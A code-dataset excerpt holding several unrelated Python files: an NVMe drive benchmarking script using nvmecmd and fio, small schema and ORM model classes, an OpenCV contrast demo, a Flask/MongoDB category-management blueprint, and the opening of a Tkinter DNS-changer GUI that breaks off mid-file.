"--nvme",f"{args.nvme}"] # NVMe drive number. e.g. 0 for nvme0 or physicaldrive0
step['code'] = run_step_process(nvmecmd_args, working_directory)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the data on the admin commands
#-------------------------------------------------------------------
step = start_step("Log-Admin-Times",test)
csv_path = os.path.join(step['directory'],"admin_commands.csv")
step['code'] = parse_admin_commands( summary_file, csv_path)
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Log Page 2 Sweep (SMART baseline)
#################################################################################################################
if 4 in args.tests:
test = start_test(4,"LogPage02-Sweep",args.dir)
step = start_step("Read",test)
logger.info("")
with open(os.path.join(f"{step['directory']}","logpage2_sweep.csv"), mode='w', newline='') as results_csv_file:
csv_writer = csv.writer(results_csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(['Idle(ms)','Avg(ms)','Min(ms)','Max(ms)','Count'])
for interval in idle_times_ms:
working_directory = os.path.join(f"{step['directory']}",f"{interval}mS")
os.makedirs(working_directory)
cmd_file = os.path.join(cmd_directory,f"logpage02.cmd.json")
summary_file = os.path.join(working_directory,"read.summary.json")
csv_path = os.path.join( working_directory, "admin_commands.csv")
if interval > 999: sample = 100
else: sample = 200
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--samples",f"{sample}",
"--interval",f"{interval}", # set interval in mS
"--dir",f"{working_directory}", # log to the directory created by start_step
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] += run_step_process(nvmecmd_args, working_directory)
avg_ms, min_ms, max_ms, count = get_admin_command("Get Log Page 2", summary_file, csv_path, 2)
interval_name = f"Idle {interval}mS then read log page"
logger.info(f"\t {interval_name:35} Avg: {avg_ms:6.2f}mS Min: {min_ms:6.2f}mS Max: {max_ms:6.2f}mS Count: {count:6}")
csv_writer.writerow([f"{interval}",f"{avg_ms}",f"{min_ms}",f"{max_ms}",f"{count}"])
logger.info("")
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Log Page 3 Sweep
#################################################################################################################
if 5 in args.tests:
test = start_test(5,"LogPage03-Sweep",args.dir)
step = start_step("Read",test)
logger.info("")
with open(os.path.join(f"{step['directory']}","logpage3_sweep.csv"), mode='w', newline='') as results_csv_file:
csv_writer = csv.writer(results_csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(['Idle(ms)','Avg(ms)','Min(ms)','Max(ms)','Count'])
for interval in idle_times_ms:
working_directory = os.path.join(f"{step['directory']}",f"{interval}mS")
os.makedirs(working_directory)
cmd_file = os.path.join(cmd_directory,f"logpage03.cmd.json")
summary_file = os.path.join(working_directory,"read.summary.json")
csv_path = os.path.join( working_directory, "admin_commands.csv")
if interval > 999: sample = 100
else: sample = 200
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--samples",f"{sample}",
"--interval",f"{interval}", # set interval in mS
"--dir",f"{working_directory}", # log to the directory created by start_step
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] += run_step_process(nvmecmd_args, working_directory)
avg_ms, min_ms, max_ms, count = get_admin_command("Get Log Page 3", summary_file, csv_path, 2)
interval_name = f"Idle {interval}mS then read log page"
logger.info(f"\t {interval_name:35} Avg: {avg_ms:6.2f}mS Min: {min_ms:6.2f}mS Max: {max_ms:6.2f}mS Count: {count:6}")
csv_writer.writerow([f"{interval}",f"{avg_ms}",f"{min_ms}",f"{max_ms}",f"{count}"])
logger.info("")
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Setup fio target file if using fio
#################################################################################################################
if (6 in args.tests) or (7 in args.tests) or (8 in args.tests):
temp_fio_target_file = os.path.abspath( os.path.join(args.volume,os.sep,"fio","target.bin"))
fio_target_file = temp_fio_target_file.replace(":",r"\:")
working_directory = os.path.join(args.dir,'fio_setup')
os.makedirs(working_directory)
try:
os.remove(temp_fio_target_file)
except:
pass
fio_startup_delay = 420 # delay in seconds before starting fio after monitor to get baseline
fio_size = '16g' # file size
fio_end_delay = 420 # delay to wait after fio completes, allows drive to cool down
fio_runtime = 720 # time in seconds to run fio
fio_rand_block_sizes = ['4k'] # block sizes for fio
fio_rand_read_percent = ['0','100'] # do read and write for fio
fio_rand_threads = 1 # number of threads for fio
fio_rand_depth = 8 # queue depth
fio_seq_block_sizes = ['1024k'] # block sizes for fio
fio_seq_read_percent = ['0','100'] # do read and write for fio
fio_seq_threads = 2 # number of threads for fio
fio_seq_depth = 64 # queue depth
fio_base_args = [FIO, # path to fio executable
"--name=fio-setup", # name for job
f"--ioengine={FIO_ASYNC_IO}", # asynchronous IO engine (Window/Linux are different)
"--direct=1", # non-buffered IO
"--numjobs=1", # Number of threads
"--thread", # Generate threads
"--rw=write", # Access seq for speed
"--iodepth=32", # Big queue depth for speed
"--bs=1024k", # Big block size for speed
"--output-format=json", # Use json output so easy to read and parse later
f"--filename={fio_target_file}", # use one file so generated only once
f"--size={fio_size}"] # size of data
setup_result = run_step_process(fio_base_args, working_directory,300)
#-------------------------------------------------------------------
# If test failed abort so can update the cmd/rules if needed
#-------------------------------------------------------------------
if setup_result:
os._exit(1)
#################################################################################################################
# Test - Random Read Sweep
#################################################################################################################
if 6 in args.tests:
test = start_test(6,"Random Read Sweep",args.dir)
step = start_step("Read",test)
fio_base_args = [FIO, # path to fio executable
"--name=fio-burst", # name for job
f"--ioengine={FIO_ASYNC_IO}", # asynchronous IO engine (Window/Linux are different)
"--direct=1", # non-buffered IO
"--numjobs=1", # Number of threads
"--thread", # Generate threads
"--rw=randread", # Access randomly
"--iodepth=1", # IO or queue depth
"--thinktime_blocks=1", # read one block then wait
"--bs=4k", # one 4K block
"--runtime=180", # run time in seconds
"--time_based", # run time specified
"--output-format=json", # Use json output so easy to read and parse later
f"--filename={fio_target_file}", # use one file so generated only once
f"--size={fio_size}"]
# log summary in a csv file and fio files in subdirectories named after interval time
with open(os.path.join(f"{step['directory']}","random_read_sweep.csv"), mode='w', newline='') as results_csv_file:
csv_writer = csv.writer(results_csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(['Idle(ms)','Avg(ms)','Min(ms)','Max(ms)','Count'])
for interval in idle_times_ms:
working_directory = os.path.join(f"{step['directory']}",f"{interval}mS")
os.makedirs(working_directory)
if interval == 0: thinktime_us = 1
else: thinktime_us = interval * 1000
fio_args = fio_base_args.copy()
fio_args.append(f"--output={working_directory}\\fio.json")
fio_args.append(f"--thinktime={thinktime_us}")
test['errors'] += run_step_process(fio_args, working_directory, 240)
ref_file = open(f"{working_directory}\\fio.json")
json_fio = json.load(ref_file)
ref_file.close()
min_ms = float(json_fio['jobs'][0]['read']['lat_ns']['min'])/NS_IN_MS
max_ms = float(json_fio['jobs'][0]['read']['lat_ns']['max'])/NS_IN_MS
avg_ms = float(json_fio['jobs'][0]['read']['lat_ns']['mean'])/NS_IN_MS
count = int(json_fio['jobs'][0]['read']['lat_ns']['N'])
interval_name = f"Idle {interval}mS then random 4k read"
logger.info(f"\t {interval_name:40} Avg: {avg_ms:6.2f}mS Min: {min_ms:6.2f}mS Max: {max_ms:6.2f}mS Count: {count:6}")
csv_writer.writerow([f"{interval}",f"{avg_ms}",f"{min_ms}",f"{max_ms}",f"{count}"])
logger.info("")
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Random Performance, single burst, fast monitor
#################################################################################################################
if 7 in args.tests:
test = start_test(7,"Random-Peformance-Monitor",args.dir)
#-------------------------------------------------------------------
# Step 1: Start nvmecmd and let run until done
#-------------------------------------------------------------------
step = start_step("Start-Monitor",test)
working_directory = monitor_directory = f"{step['directory']}"
cmd_file = os.path.join(cmd_directory,'logpage02.cmd.json')
summary_file = os.path.join(working_directory,"read.summary.json")
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read log page 2 every few seconds until ctrl-c sent to app
"--dir",f"{working_directory}", # run in the working directory
"--samples","1000000", # set number of samples to read
"--interval","2000", # set interval in mS
"--nvme",f"{args.nvme}"] # NVMe drive number. e.g. 0 for nvme0 or physicaldrive0
nvmecmd_process, nvmecmd_start_time = start_step_process(nvmecmd_args, working_directory)
if nvmecmd_process == None:
logger.error('>>>> FATAL ERROR: nvmecmd failed to start. Verify nvmecmd installed correctly')
os._exit(TEST_CASE_EXCEPTION)
try:
nvmecmd_process.wait(fio_startup_delay)
logger.error('>>>> FATAL ERROR: Test aborted because nvmecmd exited. Verify NVMe drive number is correct')
os._exit(TEST_CASE_EXCEPTION)
except subprocess.TimeoutExpired:
pass
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Run fio
#-------------------------------------------------------------------
fio_file_paths = [] # Save file paths here so can parse later
fio_base_args = [FIO, # path to fio executable
"--name=fio-burst", # name for job
f"--ioengine={FIO_ASYNC_IO}", # asynchronous IO engine (Window/Linux are different)
"--direct=1", # non-buffered IO
f"--numjobs={fio_rand_threads}", # Number of threads
"--thread", # Generate threads
"--rw=randrw", # Access randomly
f"--iodepth={fio_rand_depth}", # IO or queue depth
f"--runtime={fio_runtime}", # run time in seconds
"--time_based", # run time specified
"--output-format=json", # Use json output so easy to read and parse later
f"--filename={fio_target_file}", # use one file so generated only once
f"--size={fio_size}"] # size of data
for read_percentage in fio_rand_read_percent:
for block_size in fio_rand_block_sizes:
step = start_step(f"fio-rd{read_percentage}-bs4K",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
fio_args = fio_base_args.copy() # fresh copy for each step
fio_args.append(f"--output={working_directory}\\fio.json") # log to directory created by start_step
fio_args.append(f"--rwmixread={read_percentage}") # set read percentage
fio_args.append(f"--bs={block_size}") # set block size
fio_file_paths.append(f"{working_directory}\\fio.json") # track log file for later use
test['errors'] += run_step_process(fio_args, working_directory,(fio_runtime + 300))
time.sleep(fio_end_delay)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Signal nvmecmd to finish to stop monitoring
#-------------------------------------------------------------------
step = start_step("Stop-Monitor",test)
step['code'] = stop_monitor(monitor_directory, nvmecmd_process)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the data on the admin commands
#-------------------------------------------------------------------
step = start_step("Parse-Admin-Commands",test)
csv_path = os.path.join(step['directory'],"admin_commands.csv")
step['code'] = parse_admin_commands( summary_file, csv_path)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the fio data
#-------------------------------------------------------------------
step = start_step("Parse-Fio",test)
step['code'] = parse_fio_data(fio_file_paths,temp_fio_target_file)
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Sequential Performance, single burst, fast monitor
#################################################################################################################
if 8 in args.tests:
test = start_test(8,"Sequential-Peformance-Monitor",args.dir)
#-------------------------------------------------------------------
# Step 1: Start nvmecmd and let run until done
#-------------------------------------------------------------------
step = start_step("Start-Monitor",test)
working_directory = monitor_directory = f"{step['directory']}"
cmd_file = os.path.join(cmd_directory,'logpage02.cmd.json')
summary_file = os.path.join(working_directory,"read.summary.json")
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read log page 2 every few seconds until ctrl-c sent to app
"--dir",f"{working_directory}", # run in the working directory
"--samples","1000000", # set number of samples to read
"--interval","2000", # set interval in mS
"--nvme",f"{args.nvme}"] # NVMe drive number. e.g. 0 for nvme0 or physicaldrive0
nvmecmd_process, nvmecmd_start_time = start_step_process(nvmecmd_args, working_directory)
if nvmecmd_process == None:
logger.error('>>>> FATAL ERROR: nvmecmd failed to start. Verify nvmecmd installed correctly')
os._exit(TEST_CASE_EXCEPTION)
try:
nvmecmd_process.wait(fio_startup_delay)
logger.error('>>>> FATAL ERROR: Test aborted because nvmecmd exited. Verify NVMe drive number is correct')
os._exit(TEST_CASE_EXCEPTION)
except subprocess.TimeoutExpired:
pass
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Run fio
#-------------------------------------------------------------------
fio_file_paths = [] # Save file paths here so can parse later
fio_base_args = [FIO, # path to fio executable
"--name=fio-burst", # name for job
f"--ioengine={FIO_ASYNC_IO}", # asynchronous IO engine (Window/Linux are different)
"--direct=1", # non-buffered IO
f"--numjobs={fio_seq_threads}", # Number of threads
"--thread", # Generate threads
f"--rw=rw", # Access randomly
f"--iodepth={fio_seq_depth}", # IO or queue depth
f"--runtime={fio_runtime}", # run time in seconds
"--time_based", # run time specified
"--output-format=json", # Use json output so easy to read and parse later
f"--filename={fio_target_file}", # use one file so generated only once
f"--size={fio_size}"] # size of data
for read_percentage in fio_seq_read_percent:
for block_size in fio_seq_block_sizes:
step = start_step(f"fio-rd{read_percentage}-bs{block_size}",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
fio_args = fio_base_args.copy() # fresh copy for each step
fio_args.append(f"--output={working_directory}\\fio.json") # log to directory created by start_step
fio_args.append(f"--rwmixread={read_percentage}") # set read percentage
fio_args.append(f"--bs={block_size}") # set block size
fio_file_paths.append(f"{working_directory}\\fio.json") # track log file for later use
test['errors'] += run_step_process(fio_args, working_directory,(fio_runtime + 300))
time.sleep(fio_end_delay)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Signal nvmecmd to finish to stop monitoring
#-------------------------------------------------------------------
step = start_step("Stop-Monitor",test)
step['code'] = stop_monitor(monitor_directory, nvmecmd_process)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the data on the admin commands
#-------------------------------------------------------------------
step = start_step("Parse-Admin-Commands",test)
csv_path = os.path.join(step['directory'],"admin_commands.csv")
step['code'] = parse_admin_commands( summary_file, csv_path)
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Parse the fio data
#-------------------------------------------------------------------
step = start_step("Parse-Fio",test)
step['code'] = parse_fio_data(fio_file_paths,temp_fio_target_file)
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Test - Compare date and time references
#################################################################################################################
if 9 in args.tests:
test = start_test(9,"Nvme-Compare-Times",args.dir)
#-------------------------------------------------------------------
# Step 1: Get latest information
#-------------------------------------------------------------------
step = start_step("Read-Drive-Info",test)
working_directory = f"{step['directory']}" # directory created by start_step for logging
cmd_file = os.path.join(cmd_directory,'read.cmd.json') # use cmd file from the specified path
last_info_file = os.path.join(working_directory,"nvme.info.json") # save this for compare
nvmecmd_args = [NVMECMD, # path to nvmecmd executable defined in lib
f"{cmd_file}", # cmd file to read the NVMe information
"--dir",f"{working_directory}", # log to the directory created by start_step
"--nvme",f"{args.nvme}"] # NVMe drive number
step['code'] = run_step_process(nvmecmd_args, step['directory']) # run process in directory created by start_step
test['errors'] += end_step(step)
#-------------------------------------------------------------------
# Step 2: Compare date and times against the reference
#-------------------------------------------------------------------
step = start_step("Compare-Time",test)
step['code'] = compare_time(ref_info_file, last_info_file) # this function defined in test.py
test['errors'] += end_step(step)
script_errors += end_test(test)
#################################################################################################################
# Exit the script
#################################################################################################################
try: os.remove(temp_fio_target_file)
except: pass
os._exit(script_errors)
except:
logger.exception('ERROR: Checkout script aborted because of unhandled exception:')
os._exit(1)
|
StarcoderdataPython
|
4966145
|
<filename>src/commcare_cloud/environment/schemas/meta.py
import jsonobject
class MetaConfig(jsonobject.JsonObject):
_allow_dynamic_properties = False
deploy_env = jsonobject.StringProperty(required=True)
env_monitoring_id = jsonobject.StringProperty(required=True)
users = jsonobject.ListProperty(unicode, required=True)
slack_alerts_channel = jsonobject.StringProperty()
bare_non_cchq_environment = jsonobject.BooleanProperty(default=False)
|
StarcoderdataPython
|
4843650
|
import peewee as pw
from datetime import datetime
from playhouse.shortcuts import model_to_dict
from src.db import db
class BaseModel(pw.Model):
created_at = pw.DateTimeField(default=datetime.utcnow)
updated_at = pw.DateTimeField(default=datetime.utcnow)
def to_dict(self):
return model_to_dict(self)
def save(self, *args, **kwargs):
self.updated_at = datetime.now()
super().save(*args, **kwargs)
class Meta:
database = db
|
StarcoderdataPython
|
3317104
|
import numpy as np
import cv2
from math import ceil
# a very basic implementation of contrasting
# takes every pixel and multiplies it with a fixed number
def app_cont(image, contrast):
h, w = image.shape
new_image = np.zeros((h, w), dtype=np.uint8)
for i in range(h):
for j in range(w):
b = ceil(image[i][j] * contrast)
if b > 255:
b = 255
new_image[i][j] = b
return new_image
if __name__ == "__main__":
# change the image location to your own image location
image = cv2.imread('/home/biscuit/Python-files/images/bookpage.jpg')
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
contrast = 1.6
cont_img = app_cont(gray, contrast)
cv2.imshow('original', gray)
cv2.imshow('contrasted', cont_img)
cv2.imwrite('simple_contrast.jpg', cont_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
# END
|
StarcoderdataPython
|
3391436
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
FreeFrom Categories Python module
Version 1.1.1
"""
# Import dependencies
from flask import (
Blueprint, flash, render_template, redirect, request, url_for)
from bson.objectid import ObjectId
from forms import CategoryForm
# Import PyMongo database instance
from database import mongo
# Initiate Blueprint
categories = Blueprint(
"categories", __name__, static_folder="static",
template_folder="templates")
@categories.route("/category_add", methods=["GET", "POST"])
def category_add():
"""
Route for category add
"""
# request Form data
form = CategoryForm(request.form)
if request.method == "POST" and form.validate():
# Set new category name variable
category_name = form.name.data.lower()
if category_check(category_name):
# Add new category to the database
mongo.db.categories.insert_one({"name": category_name})
# Display flash message
flash(
"Category " + category_name +
" succesfully added", "success")
return redirect(url_for('products.search'))
else:
return render_template("category_add.html", form=form)
return render_template("category_add.html", form=form)
@categories.route("/categories_edit", methods=["GET", "POST"])
def category_edit():
"""
Route for category edit
"""
# request Form data
form = CategoryForm(request.form)
# Get categories collection from database
categories = mongo.db.categories.find().sort("name", 1)
existing_category_name = None
if request.method == "POST":
existing_category_name = category_get_selection("Update")
if request.method == "POST" and form.validate():
category_name = form.name.data.lower()
if existing_category_name and category_check(category_name):
category_id = category_get_id(existing_category_name)
# Update category in the database
if category_id:
category_update(category_id, category_name)
return redirect(url_for('products.search'))
else:
return redirect(url_for('categories.category_edit'))
else:
return render_template(
"category_edit.html", categories=categories,
existing_category_name=existing_category_name,
form=form)
return render_template(
"category_edit.html", categories=categories,
existing_category_name=existing_category_name, form=form)
@categories.route("/categories_delete", methods=["GET", "POST"])
def category_delete():
"""
Route for category delete
"""
# Get categories collection from database
categories = mongo.db.categories.find().sort("name", 1)
if request.method == "POST":
# Get existing category name
existing_category_name = request.form.get(
"categorySelector").lower()
# Check if category has been selected from drop down
if existing_category_name:
if existing_category_name == "category...":
# Display flash message
flash("Please select Category to delete", "warning")
proceed = False
else:
proceed = True
else:
# Display flash message
flash("Please select Category to delete", "warning")
proceed = False
if proceed:
# Get category
category = mongo.db.categories.find_one(
{"name": existing_category_name})
# Check if category is still in database
if category:
category_id = category["_id"]
return render_template(
"category_delete_confirm.html",
category_id=category_id, category=category)
else:
# Display flash message
flash(
"Ooops.... category " + existing_category_name +
" no longer exists in the database", "danger")
return redirect(url_for('categories.category_delete'))
else:
return render_template(
"category_delete.html", categories=categories)
return render_template(
"category_delete.html", categories=categories)
@categories.route(
"/categories_delete_confirm/<category_id>",
methods=["GET", "POST"])
def category_delete_confirm(category_id):
"""
Route for category delete confirm
"""
if request.method == "POST":
# Get category from database
category = mongo.db.categories.find_one(
{"_id": (ObjectId(category_id))})
# Check if category is still in database
if category:
# Get category name
category_name = category["name"]
# Delete category from the database
mongo.db.categories.delete_one({"_id": (ObjectId(category_id))})
# Display flash message
flash(
"Category " + category_name +
" succesfully deleted", "success")
return redirect(url_for('products.search'))
else:
# Display flash message
flash(
"Ooops.... selected category no longer " +
"exists in the database", "danger")
return redirect(url_for('categories.category_delete'))
category = mongo.db.categories.find_one(
{"_id": (ObjectId(category_id))})
return render_template(
"category_delete_confirm.html",
category_id=category_id, category=category)
def category_check(category_name):
"""
Check if category name already exists in the database
"""
if mongo.db.categories.find_one({"name": category_name}):
# Display flash message
flash("Category " + category_name +
" already exists in the database", "warning")
category_check = False
else:
category_check = True
return category_check
def category_get_id(category_name):
"""
Get category id from category name
"""
category_id = None
category = mongo.db.categories.find_one({"name": category_name})
# Check if category exists in database
if category:
category_id = category["_id"]
else:
flash(
"Ooops.... category " + category_name +
" no longer exists in the database", "danger")
return category_id
def category_get_name(category_id):
"""
Get category name from category id
"""
category_name = None
category = mongo.db.categories.find_one({"_id": category_id})
# Check if category exists in database
if category:
category_name = category["name"]
else:
flash(
"Ooops.... category " +
" no longer exists in the database", "danger")
return category_name
def category_get_selection(category_method):
"""
Get category name selected in Category Selector
"""
# Get existing category name
category_name = request.form.get("categorySelector").lower()
# If category has not been selected
if category_name == "category...":
# Display flash message
flash("Please select Category to " + category_method, "warning")
category_name = None
return category_name
def category_update(category_id, category_name):
"""
Update category in the database given category id and new category name
Returns category name
"""
mongo.db.categories.update(
{"_id": ObjectId(category_id)}, {"name": category_name})
flash("Category " + category_name + " succesfully updated", "success")
return category_name
|
StarcoderdataPython
|
8154032
|
import json
import os, ctypes
import re
from tkinter import ttk
from tkinter import messagebox as msg
from tkinter import *
import psutil
import subprocess
from urllib.request import urlopen
class Application:
def __init__(self, master, DNS: dict, connections: list):
self.dns = DNS
self.master = master
self.connections = connections
self.providers = [provider for provider in self.dns.keys()]
self.vcmd = (master.register(self.validate)) # restriction for entry fields
Application.GUI(self)
try:
self.is_admin = os.getuid() == 0 # this is for unix OS onlly and the in attribute exception is for windows
except AttributeError:
self.is_admin = ctypes.windll.shell32.IsUserAnAdmin() == 1
if not self.is_admin:
msg.showwarning("Admin privliage", "Run the program as administrator")
self.Get_DNS()
self.Check_ip()
# main window interface
def GUI(self):
main_label = Label(self.master, text = "DNS Changer", fg = 'red', font = ("Bahnschrift", 18, "bold")).place(x = 135, y = 10)
# choose provider
provider_label = Label(self.master, text = "Providers:", font = ("Halvetica", 11)).place(x = 10, y = 70)
self.provider_var = StringVar()
self.provider_combobox = ttk.Combobox(self.master, textvariable = self.provider_var, values = self.providers, state = "readonly")
self.provider_combobox.set("Choose a provider")
self.provider_combobox.place(x = 145, y = 72, width = 142)
self.provider_combobox.bind("<<ComboboxSelected>>", self.provider_changes)
# Connections
connections_label = Label(self.master, text = "Connections:", font = ("Halvetica", 11)).place(x = 10, y = 110)
self.connections_combobox = ttk.Combobox(self.master, values = self.connections, state = "readonly")
self.connections_combobox.set("Ethernet")
self.connections_combobox.place(x = 145, y = 112, width = 142)
# Primary address
primary_address_label = Label(self.master, text = "Primary address:", font = ("Halvetica", 11)).place(x = 10, y = 150)
self.primary_address_var = StringVar()
self.primary_address_entry = ttk.Entry(self.master, textvariable = self.primary_address_var, state = "disabled", validate = 'all',
validatecommand = (self.vcmd, '%P', '%S', '%i'))
self.primary_address_entry.place(x = 145, y = 152, width = 142)
# Secondary address
secondary_address_label = Label(self.master, text = "Secondary address:", font = ("Halvetica", 11)).place(x = 10, y = 190)
self.secondary_address_var = StringVar()
self.secondary_address_entry = ttk.Entry(self.master, textvariable = self.secondary_address_var, state = "disabled", validate = 'all',
validatecommand = (self.vcmd, '%P', '%S', '%i'))
self.secondary_address_entry.place(x = 145, y = 192, width = 142)
# Delete button
self.delete_icon = PhotoImage(file = r'Icons/delete.png')
self.delete_btn = ttk.Button(self.master, text = "Delete", image = self.delete_icon, compound = LEFT, command = self.Delete)
self.delete_btn.place(x = 295, y = 70, width = 77, height = 25)
# Edit/Save button
self.edit_icon = PhotoImage(file = r'Icons/edit.png')
self.save_icon = PhotoImage(file = r'Icons/save.png')
self.edit_btn = ttk.Button(self.master, text = "Edit", image = self.edit_icon, compound = LEFT, command = lambda :self.Edit_and_Save(edit = True))
self.edit_btn.place(x = 292, y = 150, width = 79, height = 25)
# Set button
self.set_icon = PhotoImage(file = r'Icons/set.png')
self.set_btn = ttk.Button(self.master, text = "Set", image = self.set_icon, compound = LEFT, command = self.Execute)
self.set_btn.place(x = 250, y = 254, width = 122, height = 25)
# Reset button
self.reset_icon = PhotoImage(file = r'Icons/reset.png')
self.reset_btn =ttk.Button(self.master, text = "Reset", image = self.reset_icon, compound = LEFT, command = self.Reset)
self.reset_btn.place(x = 250, y = 294, width = 122, height = 25)
# Add button
self.add_icon = PhotoImage(file = r'Icons/add.png')
self.add_btn = ttk.Button(self.master, text = 'Add', image = self.add_icon, compound = LEFT, command = self.Toplevel)
self.add_btn.place(x = 250, y = 334, width = 122, height = 25)
# Refresh button
self.refresh_icon = PhotoImage(file = r'Icons/refresh.png')
self.refresh_btn = ttk.Button(self.master, text = 'Refresh', image = self.refresh_icon, compound = LEFT, command = self.Refresh)
self.refresh_btn.place(x = 250, y = 374, width = 122, height = 25)
# labelframe
self.labelframe = LabelFrame(self.master, background = 'black', relief = 'sunken').place(x = 10, y = 235, width = 220, height = 189)
# ip
self.ip_label = Label(self.labelframe, text = 'IP:',bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 242)
self.ip = Label(self.labelframe,bg = 'black', font = ('Bahnschrift', 11))
self.ip.place(x = 80, y = 242)
# country
self.country_label = Label(self.labelframe, text = 'Country:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 272)
self.country = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.country.place(x = 80, y = 272)
# region
self.region_label = Label(self.labelframe, text = 'Region:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 302)
self.region = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.region.place(x = 80, y = 302)
# city
self.city_label = Label(self.labelframe, text = 'City:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 332)
self.city = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.city.place(x = 80, y = 332)
# dns 1
self.dns1_label = Label(self.labelframe, text = 'DNS 1:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 362)
self.dns1 = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.dns1.place(x = 80, y = 362)
# dns 2
self.dns2_label = Label(self.labelframe, text = 'DNS 2:', bg = 'black', fg = 'white', font = ('Bahnschrift', 11)).place(x = 15, y = 392)
self.dns2 = Label(self.labelframe, bg = 'black', font = ('Bahnschrift', 11))
self.dns2.place(x = 80, y = 392)
# Toplevel window for adding
def Toplevel(self):
self.toplevel = Toplevel()
self.add_btn['state'] = 'disabled'
self.toplevel.bind('<Destroy>', self.addBtn_state)
screen_width = self.master.winfo_screenwidth()
screen_height = self.master.winfo_screenheight()
x = (screen_width/2) - (400/2 - 65)
y = (screen_height/2) - (440/2 - 120) # 65 and 120 is the offset to make the toplevel window places at the center of the root window
self.toplevel.title("Add DNS")
self.toplevel.iconbitmap('Icons/dns.ico')
self.toplevel.geometry("270x200+%d+%d" % (x, y))
self.toplevel.resizable(False, False)
# Provider
provider_label = Label(self.toplevel, text = "Provider:", font = ("Halvetica", 11)).place(x = 10, y = 20)
self.provider_entry = ttk.Entry(self.toplevel)
self.provider_entry.place(x = 85, y = 22)
# Addresses
address1 = Label(self.toplevel, text = "Address 1:", font = ("Halvetica", 11)).place(x = 10, y = 60)
self.address1_entry = ttk.Entry(self.toplevel, validate = 'all', validatecommand = (self.vcmd, '%P', '%S', '%i'))
self.address1_entry.place(x = 85, y = 62)
address2 = Label(self.toplevel, text = "Address 2:", font = ("Halvetica", 11)).place(x = 10, y = 100)
self.address2_entry = ttk.Entry(self.toplevel, validate = 'all', validatecommand = (self.vcmd, '%P', '%S', '%i'))
self.address2_entry.place(x = 85, y = 102)
# Submit
self.submit_icon = PhotoImage(file = r'Icons/apply.png')
submit_btn = ttk.Button(self.toplevel, text = "Apply", image = self.submit_icon, compound = LEFT, command = self.Add)
submit_btn.place(x = 105, y = 145, width = 70)
# lock the root window until add window closes.
self.toplevel.transient()
self.toplevel.grab_set()
self.master.wait_window()
# check validation of user entries in dns fields
def validate(self, P, S, i):
if int(i) <= 14 and (str.isdigit(P) or P == "" or str.isdigit(S) or str(S) == "."):
return True
else:
return False
# To change entrie fields when provider changes
def provider_changes(self, event):
self.primary_address_var.set(str(self.dns[self.provider_combobox.get()]["Primary Address"]))
self.secondary_address_var.set(str(self.dns[self.provider_combobox.get()]["Secondary Address"]))
# change add button state from disable to normal while add window closes
def addBtn_state(self, event):
self.add_btn['state'] = 'normal'
# write new provider or delete in 'DNS Addresses.json'
def Write_on_DNS(self):
with open('DNS Addresses.json', 'w') as file:
file.write(json.dumps(self.dns, indent = 4))
# check fields for adding dns
def Add(self):
provider = self.provider_entry.get()
dns1 = self.address1_entry.get()
dns2 = self.address2_entry.get()
try:
if not (re.search('[a-zA-z]', provider) or re.search('[0-9]', provider)):
msg.showerror("Error", "Please input valid name which contains alphabet or numbers.")
return False
elif provider in list(self.dns.keys()):
msg.showerror("Error", "Provider already exists.")
return False
elif re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', dns1):
if dns2 == "" or re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', dns2):
pass
else:
msg.showerror("Error", "Enter secondary address in correct format.")
return False
elif dns1 == "":
msg.showerror("Error", "Primary address can not be empty.")
return False
else:
msg.showerror("Error", "Enter primary address in correct format.")
return False
except Exception as e:
msg.showerror("Error", e)
else:
self.dns.update({provider:{"Primary Address": dns1, "Secondary Address": dns2}})
self.Write_on_DNS()
self.provider_combobox['values'] = list(self.dns.keys())
self.toplevel.destroy()
# delete dns from json file
def Delete(self):
if not self.provider_combobox.get() == "Choose a provider":
del self.dns[str(self.provider_combobox.get())]
self.Write_on_DNS()
